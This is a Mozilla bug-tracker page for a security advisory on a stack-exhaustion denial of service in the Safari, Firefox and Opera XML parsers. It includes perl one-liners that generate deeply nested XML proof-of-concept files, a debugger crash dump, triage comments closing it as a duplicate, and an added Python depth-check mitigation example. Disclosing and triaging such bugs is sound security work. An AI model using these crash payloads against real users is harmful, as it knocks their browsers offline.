Apple Safari, Mozilla Firefox and Opera browser Remote Denial of Service

RESOLVED DUPLICATE of bug 485941

Status

Core
Layout
--
critical
8 years ago
8 years ago

People

(Reporter: ISecAuditors Security Advisories, Unassigned)

Tracking

({testcase})

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:dos] stack-overflow)

Attachments

(2 attachments)

(Reporter)

Description

8 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)
Build Identifier: Mozilla Firefox 3.6

III. DESCRIPTION
-------------------------
The XML parsers of the Safari, Firefox and Opera browsers are affected by a Stack Exhaustion (Stack Overflow) due to incorrect handling of XML files, resulting in a remote denial of service, crashing the affected user's browser.

IV. PROOF OF CONCEPT
-------------------------
$ perl -e 'print "<?xml version = \"1.0\"?><root><element>" . "<x>y"x30000 . "</element></root>"' > poc.xml

or simply:

$ perl -e 'print "<x>y"x30000' > poc.xml

(Opera crashes at ~7K, Safari at ~9K and Firefox at ~30K)

[...]

+ Firefox 3.6 on Windows XP SP2:

(dfc.f14): Stack overflow - code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0332e348 ecx=054d0550 edx=036ee700 esi=00000000 edi=0332e348
eip=100f1338 esp=00033000 ebp=00000000 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Archivos de programa\Mozilla Firefox\xul.dll - 
xul!NS_Realloc_P+0x3f68:
100f1338 56              push    esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> !analyze -v
(...)
FAULTING_IP: 
xul!NS_Realloc_P+3f68
100f1338 56              push    esi

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 100f1338 (xul!NS_Realloc_P+0x00003f68)
   ExceptionCode: c00000fd (Stack overflow)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00032ffc

FAULTING_THREAD:  00000f14

PROCESS_NAME:  firefox.exe

ADDITIONAL_DEBUG_TEXT:  
Use '!findthebuild' command to search for the target build information.
If the build information is available, run '!findthebuild -s ; .reload' to set symbol path and load symbols.

MODULE_NAME: xul

FAULTING_MODULE: 7c910000 ntdll

DEBUG_FLR_IMAGE_TIMESTAMP:  4b5101ce

ERROR_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva página de seguridad para la pila.

EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - No es posible crear una nueva página de seguridad para la pila.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  00032ffc

DEFAULT_BUCKET_ID:  STACK_OVERFLOW

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_WRONG_SYMBOLS

LAST_CONTROL_TRANSFER:  from 00000000 to 100f1338

STACK_TEXT:
00000000 00000000 00000000 00000000 00000000 xul!NS_Realloc_P+0x3f68

(...)


[...]


V. BUSINESS IMPACT
-------------------------
Attackers can use this vulnerability to cause a remote denial of service to end users.

Reproducible: Always

Actual Results:  
DoS web browser


VI. SYSTEMS AFFECTED
-------------------------
Tested latest version of each product, others may be affected:
Apple Safari 4.0.4
Mozilla Firefox 3.6
Opera 10.10
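
The report above attributes the crash to stack exhaustion on deeply nested elements. As an added example (not part of the original report and not Mozilla code), the following sketch shows one mitigation for services that accept untrusted XML: count nesting depth with an event-based parser, which keeps no per-element call frames, and reject input past a limit. The limit of 1000 and the names check_nesting and DepthExceeded are assumptions made for this illustration.

```python
import xml.parsers.expat

MAX_DEPTH = 1000  # assumed policy limit, not a value taken from the bug report


class DepthExceeded(Exception):
    """Raised from the start-tag handler to abort parsing early."""


def check_nesting(data: bytes, max_depth: int = MAX_DEPTH):
    """Return (verdict, deepest): verdict is 'ok', 'too-deep' or 'malformed'."""
    state = {"depth": 0, "deepest": 0}

    def on_start(name, attrs):
        state["depth"] += 1
        state["deepest"] = max(state["deepest"], state["depth"])
        if state["depth"] > max_depth:
            # Stop before any recursive consumer ever sees this document.
            raise DepthExceeded()

    def on_end(name):
        state["depth"] -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    try:
        parser.Parse(data, True)
    except DepthExceeded:
        return "too-deep", state["deepest"]
    except xml.parsers.expat.ExpatError:
        # Not well-formed, but never deeper than the limit.
        return "malformed", state["deepest"]
    return "ok", state["deepest"]


# Constructed sample inputs, following the nesting pattern described in the report.
SHALLOW = b"<root><a><b>t</b></a></root>"
DEEP_WRAPPED = (b'<?xml version = "1.0"?><root><element>'
                + b"<x>y" * 30000 + b"</element></root>")
DEEP_BARE = b"<x>y" * 30000
SHORT_UNCLOSED = b"<x>y" * 5

if __name__ == "__main__":
    for label, sample in [("shallow", SHALLOW), ("wrapped", DEEP_WRAPPED),
                          ("bare", DEEP_BARE), ("unclosed", SHORT_UNCLOSED)]:
        print(label, check_nesting(sample))
```

The depth check fires before the well-formedness error at the end of the input, so both deep samples are classified by depth rather than as merely malformed.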

Created attachment 427791
PoC

PoC per comment 0.

Created attachment 427793
PoC 2

Other PoC from comment 0.

This would be [sg:dos] anyway, but I can't confirm the crash.  Both testcases give me an XML parser error, so I'm not even getting to the stack exhaustion part.  I'm going to unhide this as we have a number of similar bugs such as bug 485941.
Group: core-security
Component: General → XUL
Keywords: testcase
Product: Firefox → Core
QA Contact: general → xptoolkit.widgets
Whiteboard: [sg:dos] stack-overflow

Comment 4

8 years ago
Isn't this just a duplicate of bug 485941?

Reed, why did you move this to XUL?  There's no XUL involved here (other than libxul, which is just the layout/dom/etc library).

(In reply to comment #4)
> Isn't this just a duplicate of bug 485941?

If it is, please feel free to mark it as such.

> Reed, why did you move this to XUL?  There's no XUL involved here (other than
> libxul, which is just the layout/dom/etc library).

My apologies. I assume the correct component would be Core :: Layout then?

Comment 6

8 years ago
Yeah.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 8 years ago
Component: XUL → Layout
QA Contact: xptoolkit.widgets → layout
Resolution: --- → DUPLICATE
Duplicate of bug: 485941